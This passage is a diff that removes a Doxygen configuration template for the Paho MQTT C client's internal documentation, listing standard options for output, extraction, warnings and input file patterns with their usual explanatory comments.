-PROJECT_NUMBER         =
-
-# Using the PROJECT_BRIEF tag one can provide an optional one line description
-# for a project that appears at the top of each page and should give viewer
-# a quick idea about the purpose of the project. Keep the description short.
-
-PROJECT_BRIEF          =
-
-# With the PROJECT_LOGO tag one can specify an logo or icon that is
-# included in the documentation. The maximum height of the logo should not
-# exceed 55 pixels and the maximum width should not exceed 200 pixels.
-# Doxygen will copy the logo to the output directory.
-
-PROJECT_LOGO           = "@PROJECT_SOURCE_DIR@/doc/pahologo.png"
-
-# The OUTPUT_DIRECTORY tag is used to specify the (relative or absolute)
-# base path where the generated documentation will be put.
-# If a relative path is entered, it will be relative to the location
-# where doxygen was started. If left blank the current directory will be used.
-
-OUTPUT_DIRECTORY       = "@CMAKE_CURRENT_BINARY_DIR@/doc/MQTTClient_internal/"
-
-# If the CREATE_SUBDIRS tag is set to YES, then doxygen will create
-# 4096 sub-directories (in 2 levels) under the output directory of each output
-# format and will distribute the generated files over these directories.
-# Enabling this option can be useful when feeding doxygen a huge amount of
-# source files, where putting all generated files in the same directory would
-# otherwise cause performance problems for the file system.
-
-CREATE_SUBDIRS         = NO
-
-# The OUTPUT_LANGUAGE tag is used to specify the language in which all
-# documentation generated by doxygen is written. Doxygen will use this
-# information to generate all constant output in the proper language.
-# The default language is English, other supported languages are:
-# Afrikaans, Arabic, Brazilian, Catalan, Chinese, Chinese-Traditional,
-# Croatian, Czech, Danish, Dutch, Esperanto, Farsi, Finnish, French, German,
-# Greek, Hungarian, Italian, Japanese, Japanese-en (Japanese with English
-# messages), Korean, Korean-en, Lithuanian, Norwegian, Macedonian, Persian,
-# Polish, Portuguese, Romanian, Russian, Serbian, Serbian-Cyrillic, Slovak,
-# Slovene, Spanish, Swedish, Ukrainian, and Vietnamese.
-
-OUTPUT_LANGUAGE        = English
-
-# If the BRIEF_MEMBER_DESC tag is set to YES (the default) Doxygen will
-# include brief member descriptions after the members that are listed in
-# the file and class documentation (similar to JavaDoc).
-# Set to NO to disable this.
-
-BRIEF_MEMBER_DESC      = YES
-
-# If the REPEAT_BRIEF tag is set to YES (the default) Doxygen will prepend
-# the brief description of a member or function before the detailed description.
-# Note: if both HIDE_UNDOC_MEMBERS and BRIEF_MEMBER_DESC are set to NO, the
-# brief descriptions will be completely suppressed.
-
-REPEAT_BRIEF           = YES
-
-# This tag implements a quasi-intelligent brief description abbreviator
-# that is used to form the text in various listings. Each string
-# in this list, if found as the leading text of the brief description, will be
-# stripped from the text and the result after processing the whole list, is
-# used as the annotated text. Otherwise, the brief description is used as-is.
-# If left blank, the following values are used ("$name" is automatically
-# replaced with the name of the entity): "The $name class" "The $name widget"
-# "The $name file" "is" "provides" "specifies" "contains"
-# "represents" "a" "an" "the"
-
-ABBREVIATE_BRIEF       = "The $name class" \
-                         "The $name widget" \
-                         "The $name file" \
-                         is \
-                         provides \
-                         specifies \
-                         contains \
-                         represents \
-                         a \
-                         an \
-                         the
-
-# If the ALWAYS_DETAILED_SEC and REPEAT_BRIEF tags are both set to YES then
-# Doxygen will generate a detailed section even if there is only a brief
-# description.
-
-ALWAYS_DETAILED_SEC    = NO
-
-# If the INLINE_INHERITED_MEMB tag is set to YES, doxygen will show all
-# inherited members of a class in the documentation of that class as if those
-# members were ordinary class members. Constructors, destructors and assignment
-# operators of the base classes will not be shown.
-
-INLINE_INHERITED_MEMB  = NO
-
-# If the FULL_PATH_NAMES tag is set to YES then Doxygen will prepend the full
-# path before files name in the file list and in the header files. If set
-# to NO the shortest path that makes the file name unique will be used.
-
-FULL_PATH_NAMES        = YES
-
-# If the FULL_PATH_NAMES tag is set to YES then the STRIP_FROM_PATH tag
-# can be used to strip a user-defined part of the path. Stripping is
-# only done if one of the specified strings matches the left-hand part of
-# the path. The tag can be used to show relative paths in the file list.
-# If left blank the directory from which doxygen is run is used as the
-# path to strip.
-
-STRIP_FROM_PATH        = 
-
-# The STRIP_FROM_INC_PATH tag can be used to strip a user-defined part of
-# the path mentioned in the documentation of a class, which tells
-# the reader which header file to include in order to use a class.
-# If left blank only the name of the header file containing the class
-# definition is used. Otherwise one should specify the include paths that
-# are normally passed to the compiler using the -I flag.
-
-STRIP_FROM_INC_PATH    =
-
-# If the SHORT_NAMES tag is set to YES, doxygen will generate much shorter
-# (but less readable) file names. This can be useful if your file system
-# doesn't support long names like on DOS, Mac, or CD-ROM.
-
-SHORT_NAMES            = NO
-
-# If the JAVADOC_AUTOBRIEF tag is set to YES then Doxygen
-# will interpret the first line (until the first dot) of a JavaDoc-style
-# comment as the brief description. If set to NO, the JavaDoc
-# comments will behave just like regular Qt-style comments
-# (thus requiring an explicit @brief command for a brief description.)
-
-JAVADOC_AUTOBRIEF      = YES
-
-# If the QT_AUTOBRIEF tag is set to YES then Doxygen will
-# interpret the first line (until the first dot) of a Qt-style
-# comment as the brief description. If set to NO, the comments
-# will behave just like regular Qt-style comments (thus requiring
-# an explicit \brief command for a brief description.)
-
-QT_AUTOBRIEF           = NO
-
-# The MULTILINE_CPP_IS_BRIEF tag can be set to YES to make Doxygen
-# treat a multi-line C++ special comment block (i.e. a block of //! or ///
-# comments) as a brief description. This used to be the default behaviour.
-# The new default is to treat a multi-line C++ comment block as a detailed
-# description. Set this tag to YES if you prefer the old behaviour instead.
-
-MULTILINE_CPP_IS_BRIEF = NO
-
-# If the INHERIT_DOCS tag is set to YES (the default) then an undocumented
-# member inherits the documentation from any documented member that it
-# re-implements.
-
-INHERIT_DOCS           = YES
-
-# If the SEPARATE_MEMBER_PAGES tag is set to YES, then doxygen will produce
-# a new page for each member. If set to NO, the documentation of a member will
-# be part of the file/class/namespace that contains it.
-
-SEPARATE_MEMBER_PAGES  = NO
-
-# The TAB_SIZE tag can be used to set the number of spaces in a tab.
-# Doxygen uses this value to replace tabs by spaces in code fragments.
-
-TAB_SIZE               = 8
-
-# This tag can be used to specify a number of aliases that acts
-# as commands in the documentation. An alias has the form "name=value".
-# For example adding "sideeffect=\par Side Effects:\n" will allow you to
-# put the command \sideeffect (or @sideeffect) in the documentation, which
-# will result in a user-defined paragraph with heading "Side Effects:".
-# You can put \n's in the value part of an alias to insert newlines.
-
-ALIASES                =
-
-# This tag can be used to specify a number of word-keyword mappings (TCL only).
-# A mapping has the form "name=value". For example adding
-# "class=itcl::class" will allow you to use the command class in the
-# itcl::class meaning.
-
-TCL_SUBST              =
-
-# Set the OPTIMIZE_OUTPUT_FOR_C tag to YES if your project consists of C
-# sources only. Doxygen will then generate output that is more tailored for C.
-# For instance, some of the names that are used will be different. The list
-# of all members will be omitted, etc.
-
-OPTIMIZE_OUTPUT_FOR_C  = YES
-
-# Set the OPTIMIZE_OUTPUT_JAVA tag to YES if your project consists of Java
-# sources only. Doxygen will then generate output that is more tailored for
-# Java. For instance, namespaces will be presented as packages, qualified
-# scopes will look different, etc.
-
-OPTIMIZE_OUTPUT_JAVA   = NO
-
-# Set the OPTIMIZE_FOR_FORTRAN tag to YES if your project consists of Fortran
-# sources only. Doxygen will then generate output that is more tailored for
-# Fortran.
-
-OPTIMIZE_FOR_FORTRAN   = NO
-
-# Set the OPTIMIZE_OUTPUT_VHDL tag to YES if your project consists of VHDL
-# sources. Doxygen will then generate output that is tailored for
-# VHDL.
-
-OPTIMIZE_OUTPUT_VHDL   = NO
-
-# Doxygen selects the parser to use depending on the extension of the files it
-# parses. With this tag you can assign which parser to use for a given extension.
-# Doxygen has a built-in mapping, but you can override or extend it using this
-# tag. The format is ext=language, where ext is a file extension, and language
-# is one of the parsers supported by doxygen: IDL, Java, Javascript, CSharp, C,
-# C++, D, PHP, Objective-C, Python, Fortran, VHDL, C, C++. For instance to make
-# doxygen treat .inc files as Fortran files (default is PHP), and .f files as C
-# (default is Fortran), use: inc=Fortran f=C. Note that for custom extensions
-# you also need to set FILE_PATTERNS otherwise the files are not read by doxygen.
-
-EXTENSION_MAPPING      =
-
-# If MARKDOWN_SUPPORT is enabled (the default) then doxygen pre-processes all
-# comments according to the Markdown format, which allows for more readable
-# documentation. See http://daringfireball.net/projects/markdown/ for details.
-# The output of markdown processing is further processed by doxygen, so you
-# can mix doxygen, HTML, and XML commands with Markdown formatting.
-# Disable only in case of backward compatibilities issues.
-
-MARKDOWN_SUPPORT       = YES
-
-# If you use STL classes (i.e. std::string, std::vector, etc.) but do not want
-# to include (a tag file for) the STL sources as input, then you should
-# set this tag to YES in order to let doxygen match functions declarations and
-# definitions whose arguments contain STL classes (e.g. func(std::string); v.s.
-# func(std::string) {}). This also makes the inheritance and collaboration
-# diagrams that involve STL classes more complete and accurate.
-
-BUILTIN_STL_SUPPORT    = NO
-
-# If you use Microsoft's C++/CLI language, you should set this option to YES to
-# enable parsing support.
-
-CPP_CLI_SUPPORT        = NO
-
-# Set the SIP_SUPPORT tag to YES if your project consists of sip sources only.
-# Doxygen will parse them like normal C++ but will assume all classes use public
-# instead of private inheritance when no explicit protection keyword is present.
-
-SIP_SUPPORT            = NO
-
-# For Microsoft's IDL there are propget and propput attributes to indicate getter
-# and setter methods for a property. Setting this option to YES (the default)
-# will make doxygen replace the get and set methods by a property in the
-# documentation. This will only work if the methods are indeed getting or
-# setting a simple type. If this is not the case, or you want to show the
-# methods anyway, you should set this option to NO.
-
-IDL_PROPERTY_SUPPORT   = YES
-
-# If member grouping is used in the documentation and the DISTRIBUTE_GROUP_DOC
-# tag is set to YES, then doxygen will reuse the documentation of the first
-# member in the group (if any) for the other members of the group. By default
-# all members of a group must be documented explicitly.
-
-DISTRIBUTE_GROUP_DOC   = NO
-
-# Set the SUBGROUPING tag to YES (the default) to allow class member groups of
-# the same type (for instance a group of public functions) to be put as a
-# subgroup of that type (e.g. under the Public Functions section). Set it to
-# NO to prevent subgrouping. Alternatively, this can be done per class using
-# the \nosubgrouping command.
-
-SUBGROUPING            = YES
-
-# When the INLINE_GROUPED_CLASSES tag is set to YES, classes, structs and
-# unions are shown inside the group in which they are included (e.g. using
-# @ingroup) instead of on a separate page (for HTML and Man pages) or
-# section (for LaTeX and RTF).
-
-INLINE_GROUPED_CLASSES = NO
-
-# When the INLINE_SIMPLE_STRUCTS tag is set to YES, structs, classes, and
-# unions with only public data fields will be shown inline in the documentation
-# of the scope in which they are defined (i.e. file, namespace, or group
-# documentation), provided this scope is documented. If set to NO (the default),
-# structs, classes, and unions are shown on a separate page (for HTML and Man
-# pages) or section (for LaTeX and RTF).
-
-INLINE_SIMPLE_STRUCTS  = NO
-
-# When TYPEDEF_HIDES_STRUCT is enabled, a typedef of a struct, union, or enum
-# is documented as struct, union, or enum with the name of the typedef. So
-# typedef struct TypeS {} TypeT, will appear in the documentation as a struct
-# with name TypeT. When disabled the typedef will appear as a member of a file,
-# namespace, or class. And the struct will be named TypeS. This can typically
-# be useful for C code in case the coding convention dictates that all compound
-# types are typedef'ed and only the typedef is referenced, never the tag name.
-
-TYPEDEF_HIDES_STRUCT   = NO
-
-# The SYMBOL_CACHE_SIZE determines the size of the internal cache use to
-# determine which symbols to keep in memory and which to flush to disk.
-# When the cache is full, less often used symbols will be written to disk.
-# For small to medium size projects (<1000 input files) the default value is
-# probably good enough. For larger projects a too small cache size can cause
-# doxygen to be busy swapping symbols to and from disk most of the time
-# causing a significant performance penalty.
-# If the system has enough physical memory increasing the cache will improve the
-# performance by keeping more symbols in memory. Note that the value works on
-# a logarithmic scale so increasing the size by one will roughly double the
-# memory usage. The cache size is given by this formula:
-# 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-SYMBOL_CACHE_SIZE      = 0
-
-# Similar to the SYMBOL_CACHE_SIZE the size of the symbol lookup cache can be
-# set using LOOKUP_CACHE_SIZE. This cache is used to resolve symbols given
-# their name and scope. Since this can be an expensive process and often the
-# same symbol appear multiple times in the code, doxygen keeps a cache of
-# pre-resolved symbols. If the cache is too small doxygen will become slower.
-# If the cache is too large, memory is wasted. The cache size is given by this
-# formula: 2^(16+LOOKUP_CACHE_SIZE). The valid range is 0..9, the default is 0,
-# corresponding to a cache size of 2^16 = 65536 symbols.
-
-LOOKUP_CACHE_SIZE      = 0
-
-#---------------------------------------------------------------------------
-# Build related configuration options
-#---------------------------------------------------------------------------
-
-# If the EXTRACT_ALL tag is set to YES doxygen will assume all entities in
-# documentation are documented, even if no documentation was available.
-# Private class members and static file members will be hidden unless
-# the EXTRACT_PRIVATE and EXTRACT_STATIC tags are set to YES
-
-EXTRACT_ALL            = NO
-
-# If the EXTRACT_PRIVATE tag is set to YES all private members of a class
-# will be included in the documentation.
-
-EXTRACT_PRIVATE        = YES
-
-# If the EXTRACT_PACKAGE tag is set to YES all members with package or internal scope will be included in the documentation.
-
-EXTRACT_PACKAGE        = NO
-
-# If the EXTRACT_STATIC tag is set to YES all static members of a file
-# will be included in the documentation.
-
-EXTRACT_STATIC         = YES
-
-# If the EXTRACT_LOCAL_CLASSES tag is set to YES classes (and structs)
-# defined locally in source files will be included in the documentation.
-# If set to NO only classes defined in header files are included.
-
-EXTRACT_LOCAL_CLASSES  = YES
-
-# This flag is only useful for Objective-C code. When set to YES local
-# methods, which are defined in the implementation section but not in
-# the interface are included in the documentation.
-# If set to NO (the default) only methods in the interface are included.
-
-EXTRACT_LOCAL_METHODS  = NO
-
-# If this flag is set to YES, the members of anonymous namespaces will be
-# extracted and appear in the documentation as a namespace called
-# 'anonymous_namespace{file}', where file will be replaced with the base
-# name of the file that contains the anonymous namespace. By default
-# anonymous namespaces are hidden.
-
-EXTRACT_ANON_NSPACES   = NO
-
-# If the HIDE_UNDOC_MEMBERS tag is set to YES, Doxygen will hide all
-# undocumented members of documented classes, files or namespaces.
-# If set to NO (the default) these members will be included in the
-# various overviews, but no documentation section is generated.
-# This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_MEMBERS     = NO
-
-# If the HIDE_UNDOC_CLASSES tag is set to YES, Doxygen will hide all
-# undocumented classes that are normally visible in the class hierarchy.
-# If set to NO (the default) these classes will be included in the various
-# overviews. This option has no effect if EXTRACT_ALL is enabled.
-
-HIDE_UNDOC_CLASSES     = NO
-
-# If the HIDE_FRIEND_COMPOUNDS tag is set to YES, Doxygen will hide all
-# friend (class|struct|union) declarations.
-# If set to NO (the default) these declarations will be included in the
-# documentation.
-
-HIDE_FRIEND_COMPOUNDS  = NO
-
-# If the HIDE_IN_BODY_DOCS tag is set to YES, Doxygen will hide any
-# documentation blocks found inside the body of a function.
-# If set to NO (the default) these blocks will be appended to the
-# function's detailed documentation block.
-
-HIDE_IN_BODY_DOCS      = NO
-
-# The INTERNAL_DOCS tag determines if documentation
-# that is typed after a \internal command is included. If the tag is set
-# to NO (the default) then the documentation will be excluded.
-# Set it to YES to include the internal documentation.
-
-INTERNAL_DOCS          = NO
-
-# If the CASE_SENSE_NAMES tag is set to NO then Doxygen will only generate
-# file names in lower-case letters. If set to YES upper-case letters are also
-# allowed. This is useful if you have classes or files whose names only differ
-# in case and if your file system supports case sensitive file names. Windows
-# and Mac users are advised to set this option to NO.
-
-CASE_SENSE_NAMES       = YES
-
-# If the HIDE_SCOPE_NAMES tag is set to NO (the default) then Doxygen
-# will show members with their full class and namespace scopes in the
-# documentation. If set to YES the scope will be hidden.
-
-HIDE_SCOPE_NAMES       = NO
-
-# If the SHOW_INCLUDE_FILES tag is set to YES (the default) then Doxygen
-# will put a list of the files that are included by a file in the documentation
-# of that file.
-
-SHOW_INCLUDE_FILES     = YES
-
-# If the FORCE_LOCAL_INCLUDES tag is set to YES then Doxygen
-# will list include files with double quotes in the documentation
-# rather than with sharp brackets.
-
-FORCE_LOCAL_INCLUDES   = NO
-
-# If the INLINE_INFO tag is set to YES (the default) then a tag [inline]
-# is inserted in the documentation for inline members.
-
-INLINE_INFO            = YES
-
-# If the SORT_MEMBER_DOCS tag is set to YES (the default) then doxygen
-# will sort the (detailed) documentation of file and class members
-# alphabetically by member name. If set to NO the members will appear in
-# declaration order.
-
-SORT_MEMBER_DOCS       = YES
-
-# If the SORT_BRIEF_DOCS tag is set to YES then doxygen will sort the
-# brief documentation of file, namespace and class members alphabetically
-# by member name. If set to NO (the default) the members will appear in
-# declaration order.
-
-SORT_BRIEF_DOCS        = NO
-
-# If the SORT_MEMBERS_CTORS_1ST tag is set to YES then doxygen
-# will sort the (brief and detailed) documentation of class members so that
-# constructors and destructors are listed first. If set to NO (the default)
-# the constructors will appear in the respective orders defined by
-# SORT_MEMBER_DOCS and SORT_BRIEF_DOCS.
-# This tag will be ignored for brief docs if SORT_BRIEF_DOCS is set to NO
-# and ignored for detailed docs if SORT_MEMBER_DOCS is set to NO.
-
-SORT_MEMBERS_CTORS_1ST = NO
-
-# If the SORT_GROUP_NAMES tag is set to YES then doxygen will sort the
-# hierarchy of group names into alphabetical order. If set to NO (the default)
-# the group names will appear in their defined order.
-
-SORT_GROUP_NAMES       = NO
-
-# If the SORT_BY_SCOPE_NAME tag is set to YES, the class list will be
-# sorted by fully-qualified names, including namespaces. If set to
-# NO (the default), the class list will be sorted only by class name,
-# not including the namespace part.
-# Note: This option is not very useful if HIDE_SCOPE_NAMES is set to YES.
-# Note: This option applies only to the class list, not to the
-# alphabetical list.
-
-SORT_BY_SCOPE_NAME     = NO
-
-# If the STRICT_PROTO_MATCHING option is enabled and doxygen fails to
-# do proper type resolution of all parameters of a function it will reject a
-# match between the prototype and the implementation of a member function even
-# if there is only one candidate or it is obvious which candidate to choose
-# by doing a simple string match. By disabling STRICT_PROTO_MATCHING doxygen
-# will still accept a match between prototype and implementation in such cases.
-
-STRICT_PROTO_MATCHING  = NO
-
-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTClient_internal
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-STRIP_FROM_PATH        = @PROJECT_SOURCE_DIR@/src
-INPUT                  = @PROJECT_SOURCE_DIR@/src
-
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          = *.cc \
-                         *.cxx \
-                         *.cpp \
-                         *.c++ \
-                         *.d \
-                         *.java \
-                         *.ii \
-                         *.ixx \
-                         *.ipp \
-                         *.i++ \
-                         *.inl \
-                         *.h \
-                         *.hh \
-                         *.hxx \
-                         *.hpp \
-                         *.h++ \
-                         *.idl \
-                         *.odl \
-                         *.cs \
-                         *.php \
-                         *.php3 \
-                         *.inc \
-                         *.m \
-                         *.mm \
-                         *.dox \
-                         *.py \
-                         *.f90 \
-                         *.f \
-                         *.vhd \
-                         *.vhdl \
-                         *.C \
-                         *.CC \
-                         *.C++ \
-                         *.II \
-                         *.I++ \
-                         *.H \
-                         *.HH \
-                         *.H++ \
-                         *.CS \
-                         *.PHP \
-                         *.PHP3 \
-                         *.M \
-                         *.MM \
-                         *.PY \
-                         *.F90 \
-                         *.F \
-                         *.VHD \
-                         *.VHDL \
-                         *.c
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
